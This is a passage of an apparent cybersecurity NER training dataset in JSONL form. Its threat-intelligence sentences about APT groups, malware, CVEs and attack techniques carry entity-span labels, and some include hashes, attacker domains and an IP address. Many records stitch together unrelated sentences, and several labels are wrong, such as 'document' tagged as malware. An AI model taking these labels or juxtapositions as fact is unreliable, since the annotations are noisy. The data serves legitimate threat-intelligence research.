c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . 
We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information .", "spans": {"MALWARE: c:\\temp\\rr.exe": [[54, 68]], "MALWARE: Bookworm samples": [[175, 191]]}, "info": {"id": "cyberner_stix_train_003252", "source": "cyberner_stix_train"}} {"text": "This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime , and it has been downloaded from the Google Play Store more than 50,000 times . After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions . Recently we noticed that these modules had been merged into a single backdoor module able to collect data from clipboard and capture screenshots . Shortly thereafter , ESET ® researchers analyzed a sophisticated new malware , which is the main suspect in this case .", "spans": {"MALWARE: Dvmap": [[11, 16]], "SYSTEM: Android": [[27, 34]], "SYSTEM: Google Play Store": [[146, 163]], "ORGANIZATION: ESET ® researchers": [[620, 638]], "MALWARE: new malware": [[664, 675]]}, "info": {"id": "cyberner_stix_train_003253", "source": "cyberner_stix_train"}} {"text": "The Lazarus group is currently one of the most active and prolific APT actors .", "spans": {"THREAT_ACTOR: Lazarus": [[4, 11]]}, "info": {"id": "cyberner_stix_train_003254", "source": "cyberner_stix_train"}} {"text": "Despite its known weaknesses , the RC4 algorithm is regularly used by malware authors . 
While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences .", "spans": {"TOOL: RC4": [[35, 38]], "ORGANIZATION: audiences": [[335, 344]]}, "info": {"id": "cyberner_stix_train_003255", "source": "cyberner_stix_train"}} {"text": "smishing ) . The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous exposés of their activity . Kaspersky Lab is releasing crucial Indicators of Compromise ( IOCs ) and other data to help organizations search for traces of these attack groups in their corporate networks .", "spans": {"THREAT_ACTOR: group": [[151, 156]], "ORGANIZATION: Kaspersky Lab": [[230, 243]], "THREAT_ACTOR: attack groups": [[363, 376]]}, "info": {"id": "cyberner_stix_train_003256", "source": "cyberner_stix_train"}} {"text": "The next stage in device infection could be the use of exploit kits and malvertising , which would be quite effective due the many Android vulnerabilities and consumers with unpatched devices . Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia . Group 72 ’s involvement in Operation SMN is another example of what sort of damage that can be done if organizations are not diligent in their efforts to secure their networks . 
As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": {"VULNERABILITY: Android vulnerabilities": [[131, 154]], "VULNERABILITY: unpatched devices": [[174, 191]], "ORGANIZATION: government institutions": [[249, 272]], "THREAT_ACTOR: Group 72": [[312, 320]], "SYSTEM: twitter": [[518, 525]], "ORGANIZATION: CSP": [[571, 574]]}, "info": {"id": "cyberner_stix_train_003257", "source": "cyberner_stix_train"}} {"text": "The result of this entire command saves a variant of the Awen asp.net webshell ( T1100 ) to the SharePoint server to further interact with the compromise server .", "spans": {"TOOL: Awen": [[57, 61]], "FILEPATH: asp.net": [[62, 69]], "TOOL: SharePoint": [[96, 106]]}, "info": {"id": "cyberner_stix_train_003258", "source": "cyberner_stix_train"}} {"text": "via Authorized App Store Impersonates security app on Google Play . Curiously though , Waterbug also compromised other computers on the victim’s network using its own infrastructure . The Lazarus used a similar infrastructure to earlier threats , including the Destover backdoor variant known as Escad .", "spans": {"SYSTEM: App Store": [[15, 24]], "SYSTEM: Google Play": [[54, 65]], "THREAT_ACTOR: Waterbug": [[87, 95]], "ORGANIZATION: infrastructure": [[167, 181]], "THREAT_ACTOR: Lazarus": [[188, 195]], "MALWARE: Destover backdoor": [[261, 278]], "MALWARE: Escad": [[296, 301]]}, "info": {"id": "cyberner_stix_train_003259", "source": "cyberner_stix_train"}} {"text": "Perkele intercepts mTANs ( confirmation codes for banking operations ) sent by the bank via text message . Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito . 
MD5 : e3878d541d17b156b7ca447eeb49d96a . Minidionis – one more APT with a usage of cloud drives • Miniduke is back : Nemesis Gemina and the Botgen Studio More details about CozyDuke are available to customers of Kaspersky Intelligence Reporting .", "spans": {"MALWARE: Perkele": [[0, 7]], "FILEPATH: e3878d541d17b156b7ca447eeb49d96a": [[210, 242]], "THREAT_ACTOR: Minidionis": [[245, 255]], "THREAT_ACTOR: Miniduke": [[302, 310]], "ORGANIZATION: Nemesis Gemina": [[321, 335]], "ORGANIZATION: Botgen Studio": [[344, 357]], "MALWARE: CozyDuke": [[377, 385]], "TOOL: Kaspersky Intelligence Reporting .": [[416, 450]]}, "info": {"id": "cyberner_stix_train_003260", "source": "cyberner_stix_train"}} {"text": "As mentioned above , banking Trojans are perhaps the most complex of all mobile threats , and Svpeng is one of the most striking examples . Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family , which has not been previously tied to the group . The campaign identifiers found in the samples we ’ve analyzed match the subdomain part of the C&C server , showing that these samples were really targeted against these universities . SocialPolitical Hacktivism primarily intrinsic Social or Ideological issues create a motivation for some to attack organizations to make a statement .", "spans": {"MALWARE: Svpeng": [[94, 100]], "TOOL: PCShare malware family": [[229, 251]], "TOOL: C&C": [[398, 401]], "ORGANIZATION: organizations": [[603, 616]]}, "info": {"id": "cyberner_stix_train_003261", "source": "cyberner_stix_train"}} {"text": "] it Firenze server1gioiat.exodus.connexxa [ . On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection . 1 . 
A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[75, 85]]}, "info": {"id": "cyberner_stix_train_003262", "source": "cyberner_stix_train"}} {"text": "To infect individuals with access to the data the actors desire , Scarlet Mimic deploys both spear-phishing and watering hole ( strategic web compromise ) attacks . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": {"THREAT_ACTOR: actors": [[50, 56]], "THREAT_ACTOR: Scarlet Mimic": [[66, 79]], "THREAT_ACTOR: APT37": [[165, 170]], "ORGANIZATION: research fellow": [[182, 197]], "ORGANIZATION: advisory member": [[200, 215]], "ORGANIZATION: journalist": [[222, 232]], "ORGANIZATION: strategic organizations": [[296, 319]]}, "info": {"id": "cyberner_stix_train_003263", "source": "cyberner_stix_train"}} {"text": "Our analysis indicates that this trojan is in its testing stage but given its potential , every mobile user should be aware of GPlayed . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . 
The publicly available backdoors and tools utilized by APT33 – including NANOCORE , NETWIRE , and ALFA Shell – are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups .", "spans": {"MALWARE: GPlayed": [[127, 134]], "THREAT_ACTOR: BITTER APT": [[137, 147]], "THREAT_ACTOR: APT33": [[286, 291]], "MALWARE: NANOCORE": [[304, 312]], "MALWARE: NETWIRE": [[315, 322]], "MALWARE: ALFA Shell": [[329, 339]], "THREAT_ACTOR: threat groups": [[460, 473]]}, "info": {"id": "cyberner_stix_train_003264", "source": "cyberner_stix_train"}} {"text": "The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server .", "spans": {"ORGANIZATION: Microsoft": [[24, 33]], "TOOL: Word": [[34, 38]], "ORGANIZATION: Adobe": [[73, 78]], "TOOL: Flash": [[79, 84], [133, 138]]}, "info": {"id": "cyberner_stix_train_003265", "source": "cyberner_stix_train"}} {"text": "From a process and file perspective , Hermes and Ryuk target files in a similar fashion . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"TOOL: Hermes": [[38, 44]], "TOOL: Ryuk": [[49, 53]], "THREAT_ACTOR: ScarCruft": [[90, 99]], "TOOL: Flash Player": [[138, 150]], "VULNERABILITY: exploit": [[151, 158]], "VULNERABILITY: CVE-2016-4117": [[161, 174]]}, "info": {"id": "cyberner_stix_train_003266", "source": "cyberner_stix_train"}} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . 
Turla is a notorious group that has been targeting governments .", "spans": {"TOOL: python script": [[63, 76]], "VULNERABILITY: CVE-2017-0144": [[132, 145]], "MALWARE: errr.aspx": [[194, 203]], "THREAT_ACTOR: Turla": [[215, 220]], "ORGANIZATION: governments": [[266, 277]]}, "info": {"id": "cyberner_stix_train_003267", "source": "cyberner_stix_train"}} {"text": "The activities of some non-governmental organizations ( NGOs ) challenge governments on politically sensitive issues such as social , humanitarian , and environmental policies .", "spans": {"ORGANIZATION: non-governmental organizations": [[23, 53]], "ORGANIZATION: NGOs": [[56, 60]]}, "info": {"id": "cyberner_stix_train_003268", "source": "cyberner_stix_train"}} {"text": "This service hides the app from plain sight and loads another ELF library to gather environmental information about the device , such as running processes and apps , and details about device hardware , primarily through parsing system logs and querying running processes . In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky . FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 .", "spans": {"THREAT_ACTOR: APT41": [[288, 293]], "ORGANIZATION: Kaspersky": [[471, 480]], "ORGANIZATION: FireEye": [[483, 490]], "ORGANIZATION: hospitality sector": [[545, 563]], "THREAT_ACTOR: actor APT28": [[589, 600]]}, "info": {"id": "cyberner_stix_train_003269", "source": "cyberner_stix_train"}} {"text": "Over time , this campaign will also infect the same device , repeatedly , with the latest malicious patches . n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants . 
The threat authors have one more evasion technique for these scheduled tasks : some Dexphot variants copy msiexec.exe to an arbitrary location and give it a random name , such as %AppData%\\.exe . As our experience with and knowledge of this threat actor grows , we will update this post or release new technical details as appropriate .", "spans": {"TOOL: DNS tunneling": [[189, 202]], "MALWARE: Dexphot": [[386, 393]], "FILEPATH: msiexec.exe": [[408, 419]], "FILEPATH: %AppData%\\.exe": [[481, 503]], "THREAT_ACTOR: threat actor": [[551, 563]]}, "info": {"id": "cyberner_stix_train_003270", "source": "cyberner_stix_train"}} {"text": "In 2016 we saw fully functional , very large SPLM / X-Agent modules supporting OS X .", "spans": {"MALWARE: SPLM": [[45, 49]], "MALWARE: X-Agent": [[52, 59]], "SYSTEM: OS X": [[79, 83]]}, "info": {"id": "cyberner_stix_train_003271", "source": "cyberner_stix_train"}} {"text": "Quasar is a publicly-available commodity RAT , an evolution of his earlier xRAT , by German developer “ MaxXor ” .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: RAT": [[41, 44]], "TOOL: xRAT": [[75, 79]]}, "info": {"id": "cyberner_stix_train_003272", "source": "cyberner_stix_train"}} {"text": "Umbrella , our secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network . This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . 
The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": {"SYSTEM: Umbrella": [[0, 8]], "MALWARE: malware": [[185, 192]], "THREAT_ACTOR: APT38": [[324, 329]], "MALWARE: DYEPACK": [[335, 342]], "ORGANIZATION: bank personnel": [[440, 454]]}, "info": {"id": "cyberner_stix_train_003273", "source": "cyberner_stix_train"}} {"text": "A PDB path contained in a tested file contained a string that appears to be a unique handle or user name .", "spans": {"TOOL: PDB": [[2, 5]]}, "info": {"id": "cyberner_stix_train_003274", "source": "cyberner_stix_train"}} {"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/Exfiltration tools supporting all major operating systems like Windows ( Bartender ) , MacOS ( JukeBox ) and Linux ( DanceFloor ) .", "spans": {"MALWARE: document": [[5, 13]], "FILEPATH: 'Improvise'": [[143, 154]], "SYSTEM: Windows": [[325, 332]], "TOOL: Bartender": [[335, 344]], "SYSTEM: MacOS": [[349, 354]], "TOOL: JukeBox": [[357, 364]], "TOOL: DanceFloor": [[379, 389]]}, "info": {"id": "cyberner_stix_train_003275", "source": "cyberner_stix_train"}} {"text": "We have examined all the detected versions , including the latest one that is signed by a certificate valid from September 14 , 2017 . This includes Python scripts . TEMP.Veles : XENOTIME .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[166, 176]], "THREAT_ACTOR: XENOTIME": [[179, 187]]}, "info": {"id": "cyberner_stix_train_003276", "source": "cyberner_stix_train"}} {"text": "Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . 
Trochilus RAT activity was discovered during both months of October and November 2015 .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]]}, "info": {"id": "cyberner_stix_train_003277", "source": "cyberner_stix_train"}} {"text": "Some tools used by this actor — specifically BlackEnergy and GCat — have been adapted from commodity malware . Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": {"THREAT_ACTOR: actor": [[24, 29]], "THREAT_ACTOR: BlackEnergy": [[45, 56]], "THREAT_ACTOR: GCat": [[61, 65]], "ORGANIZATION: Users": [[111, 116]], "THREAT_ACTOR: actors": [[204, 210]]}, "info": {"id": "cyberner_stix_train_003278", "source": "cyberner_stix_train"}} {"text": "The OnionDuke toolset includes at least a dropper , a loader , an information stealer Trojan and multiple modular variants with associated modules .", "spans": {"MALWARE: OnionDuke": [[4, 13]], "TOOL: dropper": [[42, 49]], "TOOL: loader": [[54, 60]], "TOOL: information stealer": [[66, 85]], "MALWARE: Trojan": [[86, 92]], "TOOL: multiple modular": [[97, 113]]}, "info": {"id": "cyberner_stix_train_003279", "source": "cyberner_stix_train"}} {"text": "As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs .", "spans": {"MALWARE: Zebrocy": [[50, 57]]}, "info": {"id": "cyberner_stix_train_003280", "source": "cyberner_stix_train"}} {"text": "What makes Ginp stand out is that it was built from scratch being expanded through regular updates , the last of which including code copied from the infamous Anubis banking Trojan , indicating that its author is cherry-picking the most relevant functionality for its malware . This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation . 
Dragonfly 2.0 : Berserk Bear .", "spans": {"MALWARE: Ginp": [[11, 15]], "MALWARE: Anubis": [[159, 165]], "THREAT_ACTOR: CIA's": [[310, 315]], "TOOL: 'JQJIMPROVISE'": [[316, 330]], "THREAT_ACTOR: Dragonfly 2.0": [[433, 446]], "THREAT_ACTOR: Berserk Bear": [[449, 461]]}, "info": {"id": "cyberner_stix_train_003281", "source": "cyberner_stix_train"}} {"text": "However , some of the recently identified files display “ extended-capability ”", "spans": {}, "info": {"id": "cyberner_stix_train_003282", "source": "cyberner_stix_train"}} {"text": "44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.binary.sms.receiver 9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4 APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . Winnti : dump.gxxservice.com 142.93.204.230 DigitalOcean . An attacker may have more than a single motivation to target a particular organization .", "spans": {"THREAT_ACTOR: APT40": [[253, 258]], "THREAT_ACTOR: Winnti": [[401, 407]], "DOMAIN: dump.gxxservice.com": [[410, 429]], "IP_ADDRESS: 142.93.204.230": [[430, 444]], "ORGANIZATION: DigitalOcean": [[445, 457]], "THREAT_ACTOR: An attacker": [[460, 471]], "ORGANIZATION: a particular organization": [[521, 546]]}, "info": {"id": "cyberner_stix_train_003283", "source": "cyberner_stix_train"}} {"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . 
This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": {"THREAT_ACTOR: APT32": [[27, 32]], "MALWARE: Microsoft ActiveMime file": [[74, 99]], "VULNERABILITY: exploit": [[192, 199]], "VULNERABILITY: CVE-2018-8120": [[205, 218]], "MALWARE: UACME": [[222, 227]]}, "info": {"id": "cyberner_stix_train_003284", "source": "cyberner_stix_train"}} {"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia .", "spans": {"MALWARE: malicious Word documents": [[21, 45]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[74, 138]], "VULNERABILITY: CVE-2014-6332": [[150, 163]], "FILEPATH: Okrum": [[195, 200]]}, "info": {"id": "cyberner_stix_train_003285", "source": "cyberner_stix_train"}} {"text": "Unit 42 tracks roughly 300 SilverTerrier actors who have registered a combined 11,600 domains over the past five years . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: SilverTerrier actors": [[27, 47]], "ORGANIZATION: embassies": [[198, 207]]}, "info": {"id": "cyberner_stix_train_003286", "source": "cyberner_stix_train"}} {"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . 
PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land .", "spans": {"ORGANIZATION: Unit 42": [[29, 36]], "MALWARE: EPS files": [[109, 118]], "VULNERABILITY: CVE-2015-2545": [[133, 146]], "VULNERABILITY: CVE-2017-0261": [[151, 164]], "MALWARE: PsExec": [[183, 189]], "ORGANIZATION: Microsoft": [[195, 204]]}, "info": {"id": "cyberner_stix_train_003287", "source": "cyberner_stix_train"}} {"text": "ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . APT5 has been active since at least 2007 .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "VULNERABILITY: Flash Player exploit": [[48, 68]], "VULNERABILITY: CVE-2016-4117": [[71, 84]], "THREAT_ACTOR: APT5": [[130, 134]]}, "info": {"id": "cyberner_stix_train_003288", "source": "cyberner_stix_train"}} {"text": "Threat actors can use the services' detailed statistics about which links were clicked when , and from what location , to track the success of a spearphishing campaign .", "spans": {}, "info": {"id": "cyberner_stix_train_003289", "source": "cyberner_stix_train"}} {"text": "Pivoting off the five highlighted IP ’s above with a shared infrastructure , I pulled the reverse DNS to see what other sites may be present .", "spans": {}, "info": {"id": "cyberner_stix_train_003290", "source": "cyberner_stix_train"}} {"text": "To attack macOS users , the Lazarus group has developed homemade macOS malware , and added an authentication mechanism to deliver the next stage payload very carefully , as well as loading the next-stage payload without touching the disk .", "spans": {"SYSTEM: macOS": [[10, 15], [65, 70]], "THREAT_ACTOR: Lazarus": [[28, 35]]}, "info": {"id": "cyberner_stix_train_003291", "source": "cyberner_stix_train"}} {"text": "Allows applications to access information about networks . 
As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks . They often use point-of-sale malware .", "spans": {"THREAT_ACTOR: CIA": [[82, 85]], "TOOL: point-of-sale": [[192, 205]]}, "info": {"id": "cyberner_stix_train_003292", "source": "cyberner_stix_train"}} {"text": "Pitty Tiger , like other APT attackers , often use anti-virus \" familiar names \" when registering domains or creating subdomains . In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": {"THREAT_ACTOR: Pitty Tiger": [[0, 11]], "THREAT_ACTOR: APT": [[25, 28]], "THREAT_ACTOR: attackers": [[29, 38]], "THREAT_ACTOR: MoneyTaker": [[155, 165]], "ORGANIZATION: banks": [[209, 214]], "ORGANIZATION: law firm": [[219, 227]], "ORGANIZATION: bank": [[234, 238]]}, "info": {"id": "cyberner_stix_train_003293", "source": "cyberner_stix_train"}} {"text": "Technical details Here is the meta information for the observed samples , certificates and hardcoded version stamps : Certificate MD5 Module Version Serial Number : 0x76607c02 Issuer : CN=Ron Validity : from = Tue Aug 30 13:01:30 MSK 2016 to = Sat Aug 24 13:01:30 MSK 2041 Subject : CN=Ron 9e005144ea1a583531f86663a5f14607 1 – 18abe28730c53de6d9e4786c7765c3d8 2 2.0 From March 18 to 26 we observed the malware operating in multiple areas of the world . FastUploader is a custom FTP tool designed to exfiltrate data at a faster rate than traditional FTP clients . 
When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": {"MALWARE: FastUploader": [[453, 465]], "TOOL: FTP": [[478, 481], [549, 552]], "ORGANIZATION: CrowdStrike researchers": [[568, 591]], "MALWARE: CozyDuke": [[645, 653]], "MALWARE: CozyBear": [[670, 678]], "MALWARE: CozyCar": [[681, 688]], "MALWARE: Office Monkeys": [[693, 707]], "THREAT_ACTOR: APT29": [[795, 800]], "ORGANIZATION: US White House": [[955, 969]], "ORGANIZATION: Department of State": [[972, 991]], "ORGANIZATION: Democratic National Committee": [[1000, 1029]]}, "info": {"id": "cyberner_stix_train_003294", "source": "cyberner_stix_train"}} {"text": "] 230 [ . In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke . The majority if the modifications are of removing comments and renaming variables . In fact , we saw instances of compromised stores having both skimmers loaded , which means double trouble for victims as their credit card information is stolen not just once but twice .", "spans": {"THREAT_ACTOR: Dukes": [[103, 108]], "TOOL: CosmicDuke": [[176, 186]]}, "info": {"id": "cyberner_stix_train_003295", "source": "cyberner_stix_train"}} {"text": "The Infection Chain Once the user downloads and installs one of the infected applications , ‘ SimBad ’ registers itself to the ‘ BOOT_COMPLETE ’ and ‘ USER_PRESENT ’ intents , which lets ‘ SimBad ’ to perform actions after the device has finished booting and while the user is using his device respectively . 
BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts . Suckfly conducted a multistage attack between April 22 and May 4 .", "spans": {"MALWARE: SimBad": [[94, 100], [189, 195]], "THREAT_ACTOR: BRONZE BUTLER": [[309, 322]], "TOOL: Mimikatz": [[359, 367]], "TOOL: WCE": [[372, 375]]}, "info": {"id": "cyberner_stix_train_003296", "source": "cyberner_stix_train"}} {"text": "Credential phishing and an Android banking Trojan combine in Austrian mobile attacks NOVEMBER 03 , 2017 Overview Credential phishing , banking Trojans , and credit card phishing schemes are common threats that we regularly observe both at scale and in more targeted attacks . The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation . Some organizations track North Korean clusters or groups such as Bluenoroff , APT37 , and APT38 separately , while other organizations may track some activity associated with those group names by the name Lazarus Group .", "spans": {"SYSTEM: Android": [[27, 34]], "ORGANIZATION: ClearSky": [[461, 469]], "THREAT_ACTOR: Bluenoroff": [[589, 599]], "THREAT_ACTOR: APT37": [[602, 607]], "THREAT_ACTOR: APT38": [[614, 619]], "THREAT_ACTOR: Lazarus Group": [[729, 742]]}, "info": {"id": "cyberner_stix_train_003297", "source": "cyberner_stix_train"}} {"text": "Within some of the first of those commands , the bot typically receives a list of banks it will target . Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity . This is probably the Latin spelling for the word “health” in Farsi . 
Forbes Technology Council is an invitationonly community for worldclass CIOs , CTOs and technology executives .", "spans": {"THREAT_ACTOR: APT37": [[225, 230]], "ORGANIZATION: Forbes Technology Council": [[400, 425]]}, "info": {"id": "cyberner_stix_train_003298", "source": "cyberner_stix_train"}} {"text": "Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests .", "spans": {"THREAT_ACTOR: group": [[36, 41]], "ORGANIZATION: Governments": [[120, 131]], "ORGANIZATION: Academy": [[134, 141]], "ORGANIZATION: Crypto-Currency": [[144, 159]], "ORGANIZATION: Telecommunications": [[162, 180]], "ORGANIZATION: Oil sectors": [[189, 200]], "FILEPATH: malware": [[207, 214]], "MALWARE: CMD/PowerShell": [[243, 257]], "THREAT_ACTOR: attackers": [[275, 284]]}, "info": {"id": "cyberner_stix_train_003299", "source": "cyberner_stix_train"}} {"text": "The MUTEX name is different too : FG00nxojVs4gLBnwKc7HhmdK0h .", "spans": {}, "info": {"id": "cyberner_stix_train_003300", "source": "cyberner_stix_train"}} {"text": "In this case , we ’re seeing a definite problem with the overly-conservative naming approach used as it engenders confusion in a significant subset of the intended audience .", "spans": {}, "info": {"id": "cyberner_stix_train_003301", "source": "cyberner_stix_train"}} {"text": "When a suitable .exe file candidate is found , it is copied into the malware installation folder ( for example , C : \\ProgramData ) . Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations . wsc_proxy.exe plugins-setup.exe SoftManager.exe GetEFA.exe . 
Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": {"ORGANIZATION: CTU": [[184, 187]], "FILEPATH: wsc_proxy.exe": [[270, 283]], "FILEPATH: plugins-setup.exe": [[284, 301]], "FILEPATH: SoftManager.exe": [[302, 317]], "FILEPATH: GetEFA.exe": [[318, 328]], "MALWARE: Rhysida": [[331, 338]]}, "info": {"id": "cyberner_stix_train_003302", "source": "cyberner_stix_train"}} {"text": "After rendering the ad on the screen , the app tries to identify the part of the advertisement website to click . Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . The message subject read “ DPP ’s Contact Information Update ” , apparently targeting those interested in contact information for DPP members or politicians . ( CISA , CNN )", "spans": {"MALWARE: attachment": [[149, 159]], "TOOL: NetTraveler": [[193, 204]], "MALWARE: DLL side-loading": [[213, 229]], "ORGANIZATION: DPP": [[276, 279], [379, 382]], "ORGANIZATION: CISA": [[410, 414]], "ORGANIZATION: CNN": [[417, 420]]}, "info": {"id": "cyberner_stix_train_003303", "source": "cyberner_stix_train"}} {"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec , we have seen infections in multiple countries due to the nature of the victims operating large international corporations . 
As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like .", "spans": {"ORGANIZATION: Symantec": [[88, 96]]}, "info": {"id": "cyberner_stix_train_003304", "source": "cyberner_stix_train"}} {"text": "This group has been operating in the Middle East since 2012 .", "spans": {}, "info": {"id": "cyberner_stix_train_003305", "source": "cyberner_stix_train"}} {"text": "The ZIP archives have names relevant to the targets and contain both legitimate files and malware .", "spans": {"TOOL: ZIP": [[4, 7]]}, "info": {"id": "cyberner_stix_train_003306", "source": "cyberner_stix_train"}} {"text": "Based on our technical analysis of the known PinchDuke samples from 2008 however , we believe PinchDuke to have been under development by the summer of 2008 .", "spans": {"MALWARE: PinchDuke": [[45, 54], [94, 103]]}, "info": {"id": "cyberner_stix_train_003307", "source": "cyberner_stix_train"}} {"text": "Aside from the natural value of phone numbers associated with the names of their owners . After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals . Once this export is called , it checks for a hidden window with a caption of Hello Google ! 
Based upon analysis and gathered data , we have determined that the operation is conducted by a Vietnamese threat actor .", "spans": {"TOOL: Powermud": [[144, 152]], "TOOL: Powemuddy": [[156, 165]], "THREAT_ACTOR: Seedworm": [[168, 176]]}, "info": {"id": "cyberner_stix_train_003308", "source": "cyberner_stix_train"}} {"text": "CVE-2015-8651 : Adobe Flash Player 18.0.0.324 and 19.x Vulnerability .", "spans": {"VULNERABILITY: CVE-2015-8651": [[0, 13]], "TOOL: Adobe Flash Player": [[16, 34]]}, "info": {"id": "cyberner_stix_train_003309", "source": "cyberner_stix_train"}} {"text": "However , the keylogger needs to be specifically enabled by a command sent from the C2 server . The company specializes in finance and natural resources specific to that region . FIN7 S-APT/Cobalt phishing documents may seem basic , but when combined with their extensive social engineering and focused targeting , they are quite successful . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": {"ORGANIZATION: finance": [[123, 130]], "MALWARE: FIN7 S-APT/Cobalt": [[179, 196]], "MALWARE: SocGholish": [[421, 431]]}, "info": {"id": "cyberner_stix_train_003310", "source": "cyberner_stix_train"}} {"text": "Figure 5 – Keylogger component Figure 6 shows one of the most noteworthy functions of Anubis : its ransomware module . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . FIN7 S-APT/GRIFFON : hpservice-cdn.com realtek-cdn.com logitech-cdn.com pci-cdn.com appleservice-cdn.com servicebing-cdn.com . 
